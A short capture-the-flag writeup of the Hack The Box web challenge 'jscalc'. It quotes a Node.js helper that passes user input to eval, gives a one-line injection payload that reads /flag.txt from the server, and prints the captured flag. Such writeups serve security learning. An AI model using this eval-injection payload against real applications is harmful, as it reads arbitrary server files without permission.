jscalc

Posted on Sat 28 December 2024 in HTB challenge

This is a writeup of the jscalc challenge which is a web challenge from Hack The Box.

The vulnerable code can be found in calculatorHelper.js

module.exports = {
    calculate(formula) {
        try {
            return eval(`(function() { return ${ formula } ;}())`);

        } catch (e) {
            if (e instanceof SyntaxError) {
                return 'Something went wrong!';
            }
        }
    }
}

The formula is directly provided by user. So by entering the following formula we can read the flag:

require("fs").readFileSync("/flag.txt").toString()

587a6cbf395b31bfc5190a3144a51e4c.png

This results in the following flag:

HTB{c4lcul4t3d_my_w4y_thr0ugh_rc3}

web